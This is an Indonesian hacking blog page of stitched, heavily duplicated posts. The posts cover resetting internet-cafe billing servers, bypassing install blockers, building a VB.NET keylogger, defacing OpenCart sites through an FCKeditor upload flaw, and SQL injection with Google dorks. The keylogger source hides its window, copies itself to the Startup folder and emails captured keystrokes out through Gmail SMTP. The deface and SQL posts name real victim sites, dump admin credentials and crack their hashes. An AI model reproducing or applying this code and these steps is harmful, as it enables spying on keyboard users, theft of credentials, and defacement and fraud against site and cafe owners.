VIDEO DI BAWAH
http://www.youtube.com/watch?v=aEXM0ewiSIE
Tutorial Hack PB
Download bahan-bahan nya
- Bahan 1 download
- Bahan 2 download
link bisa pm di fb 3000 G-cash sampai bisa MY FB
NB : Metode Panen Di Warnet
 |
Billing exploder for reset billing
22.16
buat kamu yg maen pb di warnet tapi gk punya duit,
kamu bisa reset billing dengan billing exploder
1. Kamu harus tahu IP servernya
2. Masukkan IP server ke kotak IP
3. Masukkan Port BilingServer (default: 1500)
4. Klik ‘Connect’
5. Jika status berubah menjadi
‘Connected’, maka kamu sudah berhasil
6. Sekarang terserah kamu mau ngapain,
Reset PC kamu atau semua PC (Reset All)
7. Juga terdapat tool seperti ‘Data Chat’,
Anonymous Msg Sender, Billing Flooder, Msg Sniffer.
kamu bisa reset billing dengan billing exploder
1. Kamu harus tahu IP servernya
2. Masukkan IP server ke kotak IP
3. Masukkan Port BilingServer (default: 1500)
4. Klik ‘Connect’
5. Jika status berubah menjadi
‘Connected’, maka kamu sudah berhasil
6. Sekarang terserah kamu mau ngapain,
Reset PC kamu atau semua PC (Reset All)
7. Juga terdapat tool seperti ‘Data Chat’,
Anonymous Msg Sender, Billing Flooder, Msg Sniffer.
Jebol Install-Block for Bayu...
08.04
nah, ini request dari mas bayu, yang saya harapkan ikut PHC, eh malah g dateng,,,gpp...ne tutorialnya kalo mu ngerjain tuh warnet, eits...jangan dirusak tapi ya...
ini lanjutan dari tutorial saya yang ini guys...http://www.phc.web.id/2011/01/instal-block-buat-apaan-sih-nah-guys.html
nah, intinya sebel kan kalo kita ke warnet terus mau nginstal macem2 ternyata gak bisa, ya itu bisa jadi ada software instal blocknya yang ngeblock semua bentuk instalasi...
ini lanjutan dari tutorial saya yang ini guys...http://www.phc.web.id/2011/01/instal-block-buat-apaan-sih-nah-guys.html
nah, intinya sebel kan kalo kita ke warnet terus mau nginstal macem2 ternyata gak bisa, ya itu bisa jadi ada software instal blocknya yang ngeblock semua bentuk instalasi...
ne cara jebolnya...
- download dulu softwarenya disini...
- kalo udah, jalankan dulu programnya, tampilannya seperti dibawah ini...
Gambar 1 : Bypass - Instal Block- Nah, software ini berfungsi untuk mengembalikan password instal block ke awal, defaultnya sih admin...nanti ya coba kita liat...
- Status instal block masih dalam keadaan aktif...nah, klik aja dulu tombol kill untuk mamatikannya...
Gambar 2 : Status instal block sudah tidak aktif...- Nah, pada tahap ini jika kita tidak ingin menjebol secara keseluruhan, kita sudah bisa menginstal program pada warnet client apa aja yang kita inginkan, tapi kalo kamu belum puas dan pengen sekalian jebol tuh instal-block,,,caranya ya tinggal klik aja tombol bypass
- setelah itu tinggal masuk dan liat perubahan password pada instal block itu...
Gambar 3 : Password Install Block sudah hilang...wah kejam ya...
Gambar 4 : Kalo kita jalankan tuh software, lihat hasilnya, passwordnya udah kembali ke admin lagi...oke guys, semoga bermanfaat, untuk pengembangan bagaimana cara menjalankannya, ada dimana letak programnya...bisa hubungi saya langsung...
pastinya ne, si empunya warnet gak gitu aja ngasih kemudahan si clientnya bisa dijebal-jebol gitu aja,,,iya gak...hehehe...semangat....
pastinya ne, si empunya warnet gak gitu aja ngasih kemudahan si clientnya bisa dijebal-jebol gitu aja,,,iya gak...hehehe...semangat....
MEMBUAT KEYLOGGER SENDIRI
00.41
untuk membuat keylogger ini kita membutuhkan program Visual basic.net jadi wajib di install dulu VB nya atau download disini.
mari memulai ,buka VB.net lalu pilih File->New project ->"Windows Forms Application" beri nama "Logic Keylogger" lalu Ok
sekarang kita akan membuat tampilan seperti dibawah ini,masuk ke Toolbox (dikiri) dan tambahkan 2 text box,2 labels,dan satu Tombol,atur tampilan nya menjadi seperti dibawah ini
sekarang klik kanan di form dan klik view code,CTRL-A lalu delete
Paste kan code ini
Code:
Imports System.IO
Public Class Form1
Dim stub, text1, text2 As String
Const FileSplit = "@vorfin@"
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
For Fadein = 0.0 To 1.1 Step 0.1
Me.Opacity = Fadein
Me.Refresh()
Threading.Thread.Sleep(100)
Next
End Sub
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
text1 = TextBox1.Text
text2 = TextBox2.Text
FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
stub = Space(LOF(1))
setelah itu pilih File-> Save All.Lalu klik Build,Build Logic Keylogger.
Oke builder uda dibuat,kita buat file stub nya
klik File -> New project->Form Application->Stub-> OK.
di form ini kita tambahkan 3 timers,di bawah kanan rubah times seperti berikut
Timer1-Interval=100
Timer2-Interval=900000
Timer3-Interval=900100
ubah nama form tersebut mnjadi "Windows Run .dll",set opacity menjadi 0% dan ubah "Show Icon In Taskbar" menjadi false.
tambahkan 3 text box seperti ini
Text Box yang gede = Text Box 1(set menjadi "Enabled=False")
Text box kiri = Text box 2
Text box kanan = Text box 3
Seperti tadi ,..Klik kanan -> view Code->delete ,paste kan code ini:
Code:
Imports System.IO
Imports System.Net.Mail
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Dim options(), text1, text2 As String
Const FileSplit = "@vorfin@"
Dim Lserver As String = IO.Path.GetFileName(Application.ExecutablePath)
Dim vDirectory As String
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
text1 = Space(LOF(1))
text2 = Space(LOF(1))
FileGet(1, text1)
FileGet(1, text2)
FileClose(1)
options = Split(text1, FileSplit)
TextBox2.Text = options(1)
TextBox3.Text = options(2)
vDirectory = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
Dim zDir As New DirectoryInfo(vDirectory)
If Not zDir.Exists Then
My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" & Lserver, True)
Else
My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & Lserver, True)
End If
Timer1.Start()
Timer2.Start()
Timer3.Start()
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
End Sub
Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
Dim MyMailMessage As New MailMessage
MyMailMessage.From = New MailAddress(TextBox2.Text)
MyMailMessage.To.Add(TextBox2.Text)
MyMailMessage.Subject = ("Logs")
MyMailMessage.Body = (TextBox1.Text)
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox2.Text, TextBox3.Text)
SMTPServer.EnableSsl = True
SMTPServer.Send(MyMailMessage)
End Sub
Private Sub Timer3_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer3.Tick
TextBox1.Clear()
End Sub
End Class
lalu save lagi dan Build
Masuk ke "C\:Dir\Logic Keylogger\bin\release" lalu tambahkan .exe di desktop
lakukan yang sama terhadap stub nya
Run "Logic Keylogger" Enter Information,klik Build.
Selamat kamu baru aja membuat kylogger pertama kamu.
Note: Stub mungkin gak perlu di delete,tapi tidak di butuhkan untuk dikirim bersama server program nya.
Note: Keylogger ini akan mencoba memasuki startup folder di XP,untuk membuat startup di vista hapus kode ini di code yang ke-2
Code:
vDirectory = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
Dim zDir As New DirectoryInfo(vDirectory)
If Not zDir.Exists Then
My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" & Lserver, True)
Else
My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & Lserver, True)
End If
mari memulai ,buka VB.net lalu pilih File->New project ->"Windows Forms Application" beri nama "Logic Keylogger" lalu Ok
sekarang kita akan membuat tampilan seperti dibawah ini,masuk ke Toolbox (dikiri) dan tambahkan 2 text box,2 labels,dan satu Tombol,atur tampilan nya menjadi seperti dibawah ini
sekarang klik kanan di form dan klik view code,CTRL-A lalu delete
Paste kan code ini
Code:
Imports System.IO
Public Class Form1
Dim stub, text1, text2 As String
Const FileSplit = "@vorfin@"
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
For Fadein = 0.0 To 1.1 Step 0.1
Me.Opacity = Fadein
Me.Refresh()
Threading.Thread.Sleep(100)
Next
End Sub
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
text1 = TextBox1.Text
text2 = TextBox2.Text
FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
stub = Space(LOF(1))
setelah itu pilih File-> Save All.Lalu klik Build,Build Logic Keylogger.
Oke builder uda dibuat,kita buat file stub nya
klik File -> New project->Form Application->Stub-> OK.
di form ini kita tambahkan 3 timers,di bawah kanan rubah times seperti berikut
Timer1-Interval=100
Timer2-Interval=900000
Timer3-Interval=900100
ubah nama form tersebut mnjadi "Windows Run .dll",set opacity menjadi 0% dan ubah "Show Icon In Taskbar" menjadi false.
tambahkan 3 text box seperti ini
Text Box yang gede = Text Box 1(set menjadi "Enabled=False")
Text box kiri = Text box 2
Text box kanan = Text box 3
Seperti tadi ,..Klik kanan -> view Code->delete ,paste kan code ini:
Code:
Imports System.IO
Imports System.Net.Mail
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Dim options(), text1, text2 As String
Const FileSplit = "@vorfin@"
Dim Lserver As String = IO.Path.GetFileName(Application.ExecutablePath)
Dim vDirectory As String
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
text1 = Space(LOF(1))
text2 = Space(LOF(1))
FileGet(1, text1)
FileGet(1, text2)
FileClose(1)
options = Split(text1, FileSplit)
TextBox2.Text = options(1)
TextBox3.Text = options(2)
vDirectory = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
Dim zDir As New DirectoryInfo(vDirectory)
If Not zDir.Exists Then
My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" & Lserver, True)
Else
My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & Lserver, True)
End If
Timer1.Start()
Timer2.Start()
Timer3.Start()
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
End Sub
Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
Dim MyMailMessage As New MailMessage
MyMailMessage.From = New MailAddress(TextBox2.Text)
MyMailMessage.To.Add(TextBox2.Text)
MyMailMessage.Subject = ("Logs")
MyMailMessage.Body = (TextBox1.Text)
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox2.Text, TextBox3.Text)
SMTPServer.EnableSsl = True
SMTPServer.Send(MyMailMessage)
End Sub
Private Sub Timer3_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer3.Tick
TextBox1.Clear()
End Sub
End Class
lalu save lagi dan Build
Masuk ke "C\:Dir\Logic Keylogger\bin\release" lalu tambahkan .exe di desktop
lakukan yang sama terhadap stub nya
Run "Logic Keylogger" Enter Information,klik Build.
Selamat kamu baru aja membuat kylogger pertama kamu.
Note: Stub mungkin gak perlu di delete,tapi tidak di butuhkan untuk dikirim bersama server program nya.
Note: Keylogger ini akan mencoba memasuki startup folder di XP,untuk membuat startup di vista hapus kode ini di code yang ke-2
Code:
vDirectory = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
Dim zDir As New DirectoryInfo(vDirectory)
If Not zDir.Exists Then
My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" & Lserver, True)
Else
My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & Lserver, True)
End If
Tutorial Deface
23.31
nh Tutorial Deface Remote File Upload powered by opencart
tutorial ini cocok buat newbie,awam,etc.
bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya..
Cth: http://www.target.com/patch/
kalo udah dpet targetnya, langsung aja pasang exploitnya
hasilnya jadi kaya gini :
cth: http://iphoneclone.b...ctors/test.html
jika target ada /patch/ nya , inject exploitnya di belakang /pacth/
cth : www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
kalo udah di situ ada tempat upload file nya
konektornya pilih PHP, terus upload dah file Html nya
kalo berhasil ada alert kaya gini "file uploaded with no errors"
terus kalo udah berhasil klik "Get Folders and Files"
SS :
selesai sekarang kamu bisa liat hasilnya...
cth hasil yg saya buat :
http://iphoneclone.biz/XyonJR.html
http://www.livrariad...e.org/Xyon.html
http://www.keltecsub2000.com/Xyon.html
http://tamikoshop.com/Xyon.html
http://dagang.asia/Xyon.html
http://tamikoshop.com/Xyon.html
NB : file yg kita upload nggak bisa timpa file terdahulu, ntar hasilnya jadi duplikat file(1).html or file(2).html..
sekian...
tutorial ini cocok buat newbie,awam,etc.
Quote
dork : Powered By OpenCart site:com
"site:" terserah, yang penting support opencart
Cth target: http://iphoneclone.biz/
jangan lupa siapkan file Html nya(buat sendiri)
"site:" terserah, yang penting support opencart
Cth target: http://iphoneclone.biz/
jangan lupa siapkan file Html nya(buat sendiri)
bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya..
Cth: http://www.target.com/patch/
kalo udah dpet targetnya, langsung aja pasang exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
hasilnya jadi kaya gini :
cth: http://iphoneclone.b...ctors/test.html
jika target ada /patch/ nya , inject exploitnya di belakang /pacth/
cth : www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
kalo udah di situ ada tempat upload file nya
konektornya pilih PHP, terus upload dah file Html nya
kalo berhasil ada alert kaya gini "file uploaded with no errors"
terus kalo udah berhasil klik "Get Folders and Files"
SS :
selesai sekarang kamu bisa liat hasilnya...
cth hasil yg saya buat :
http://iphoneclone.biz/XyonJR.html
http://www.livrariad...e.org/Xyon.html
http://www.keltecsub2000.com/Xyon.html
http://tamikoshop.com/Xyon.html
http://dagang.asia/Xyon.html
http://tamikoshop.com/Xyon.html
NB : file yg kita upload nggak bisa timpa file terdahulu, ntar hasilnya jadi duplikat file(1).html or file(2).html..
sekian...
Cara Singkat Deface Website Dengan Tools SQLI Helper
06.38
Sebenarnya bug SQL pada situs-situs berbasis php sudah lama ditemukan. Karena bug itu sudah lama, jadi sudah tidak banyak lagi situs-situs yang terdapat bug SQL-nya.
Tapi setelah saya coba searching dengan bantuan om Google, ternyata masih ada loh…. ^^. Ada baiknya trik ini dipakai cuman untuk media pembelajaran. Kalaupun nanti anda melakukan lebih dari itu, saya gak tanggung jawab deh! haha….
Nah, seperti pada judul diatas. Kita akan melakukan teknik SQL Injection Union pada situs-situs berbasis php dengan bantuan tools SQLI Helper.
Namun jika anda ingin melakukannya secara manual, anda bisa mencari situs-situs yang mengupas artikel SQL Injection secara manual. Banyak kok…..
Tapi kalau ada yang gampang, ngapain cari yang susah!! Bener gak? Hahahaha….
Ok, kita langsung saja ya…..
Langkah pertama, download tools SQLI Helper V 2.7 melalui link dibawah ini. Sizenya gak gede-gede amat kok. Cuman 241 KB. Download klik disini.
Oh ya, ketika anda menjalankan tools ini. Pastikan safety guard/resident shield antivirus anda dalam keadaan nonaktif ya. Soalnya tools ini akan dianggap trojan. Tapi saya jamin, tools ini aman kok. ^^
Langkah kedua, setelah selesai didownload. Buka tools tersebut, dan akan muncul tampilan kurang
lebih seperti ini.
Pada kolom Target, kita akan mengisikan alamat url situs yang kita curigai masih terdapat bug SQL-nya. Namun url yang dijadikan target bukan url seperti biasanya, misalnya : http://duniainternet.info. Namun, http://www.er.com.my/Content.php?id=1.
Loh, cara dapetin url seperti itu gimana? mudah kok….!! Dengan bantuan om Google, apapun yang kita cari bisa kita dapatkan. (berarti bisa tau sapi saya yang ilang dong? XD).
Buka Google.com. Lalu masukkan script berikut di kotak penelusuran.
Kumpulan perintah Google dorkscript dork SQL injection :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak sih script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk anda. Sabar aja ya…
Langkah ketiga, diumpamakan anda telah memilih satu situs yang akan digunakan sebagai target. Namun kita harus tahu, situs tersebut terdapat bug SQL nya tidak? cara cepat mengetahui situs tersebut vuln terhadapt serangan SQL adalah dengan memberikan tanda ” ‘ “(petik satu) di akhir url tersebut.
Contoh :
Situs target http://www.er.com.my/Content.php?id=1. Cek apakah situs tersebut ada bug SQLnya dengan menambahkan http://www.er.com.my/Content.php?id=1‘ (tanda petik satu) dibelakang 1. Paham?
Nah, kalau situs itu mengeluarkan pesan error. Maka bisa disimpulkan, situs tersebut masih vuln dengan SQL Injection. Pesan error-nya kurang lebih seperti ini.
Langkah keempat, masukkan url situs tadi ke kolom Target di tools SQLI Helper. Oh ya, tanda petiknya gak usah dipakai lagi ya. Cukup urlnya saja. Ingat….. tanpa tanda petik di akhir url!!
Setelah itu klik Inject. Maka secara otomatis dia akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll.
Kalau langkah Inject berhasil, maka akan muncul tampilan seperti ini.
Mantab!! Sekarang saatnya klik Get Database dibawah menu Inject.
Selanjutnya, klik Database name. Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawag, saya memilih database natural. Selanjutnya klik Get Tables.
Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin.
Seperti contoh diatas, saya mendapatkan tabel admin_user. Doakan saja terdapt informasi username dan password admin didalam tabel tersebut. Langkah selanjutnya pilih admin_user dan klik Get Coloumns.
Wahhhhh… ternyata benar! Disana tersimpan user_name, user_email, dan tentunya user_pwd (password). Cihuyy… langsung aja blok user_name, dan user_pwd lalu tekan Dump Now.
Maka dengan segera, informasi mengenai username dan password administrator jatuh ketangan kita. Hahaha….. Gimana, mudah ya?
Ada yang aneh?? Password yang ditampilkan bentuknya seperti ini ya?
987d29241cc4f2a7465f2d9356ab3615
987d29241cc4f2a7465f2d9356ab3615
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?
Caranya cukup mudah, buka saja situs md5crack.com, lalu masukkan kode tersebut di kotak penelusuran. Berdoa saja password anda tersebut cukup lemah, sehingga bisa dipecahkan dengan metode brute force. Setelah anda masukkan, klik Crack hash.
Maka, si password pun muncul….! Passwordnya ternyata admin.
Langkah kelima, jika username dan password situs tersebut sudah ditangan, selanjutnya tinggal mencari form login dari situs tersebut. Misalnya :
- http://situsanda.com/admin/
- http://situsanda.com/login/
- http://situsanda.com/administrator/
- dsb……
Masih gak bisa juga??? Ck…ck…ck…. ya udah. Download tools Admin Finder deh kalo anda kesusahan dalam mencari form login situs tersebut. Download klik disini.
Cara kerjanya cukup mudah kok, tinggal masukkan url situs tersebut dan tunggu tools itu bekerja secara otomatis mencari halaman adminnya. Berdoa saja tools tersebut juga menemukannya….
Jrengg….jreng…jrenggg….! Kita umpamakan anda telah mengetahui username, password, dan halaman admin website tersebut. Maka tinggal eksekusi deh website tersebut…. Hahaha.
Saran saya cuman satu, usahakan jangan merusak tampilan website terseubut. Buat aja halaman baru yang memberitahukan bahwa situs tersebut terdapat bug SQL nya. Ingat dosa gan…. !!
Wahh capek juga berbagi ilmu kepada orang lain.
NOTE: JANGAN GUNAKAN UNTUK KEJAHATAN.
08.40
Panah Atas : Wallshot ON
Panah bawah : Wallshoot Off
Panah kiri : Minimize ON
Panah Kanan : Minimize OFF
DELETE : Quick Exit
-Cara Gunaain Wallshot Dan Minimize Seperti Biasa
F1 : RANK Hack
F2 : TITLE Hack
F3 : Character Tero
F4 :Character Blue
F5 : Replace
-Gunain Character Pencet Hotkey Character Di lobby
-Ready Pass Bacaan "Sedang Mempersiapkan Game" Teken F5
NUMPAD 1 : BARET BUSTER
NUMPAD 2 : STIL ASSASIN
NUMPAD 3 : Shooting Stars
NUMPAD 4 : Nibble Snaker
NUMPAD 5 : GM
F6 : White Mask
F7 : Black Mask
Credit [A]rsaz- Green
[A]Rsaz Fullhack
Panah Atas : Wallshot ON
Panah bawah : Wallshoot Off
Panah kiri : Minimize ON
Panah Kanan : Minimize OFF
DELETE : Quick Exit
-Cara Gunaain Wallshot Dan Minimize Seperti Biasa
F1 : RANK Hack
F2 : TITLE Hack
F3 : Character Tero
F4 :Character Blue
F5 : Replace
-Gunain Character Pencet Hotkey Character Di lobby
-Ready Pass Bacaan "Sedang Mempersiapkan Game" Teken F5
NUMPAD 1 : BARET BUSTER
NUMPAD 2 : STIL ASSASIN
NUMPAD 3 : Shooting Stars
NUMPAD 4 : Nibble Snaker
NUMPAD 5 : GM
F6 : White Mask
F7 : Black Mask
Credit [A]rsaz- Green
Langganan:
Postingan (Atom)
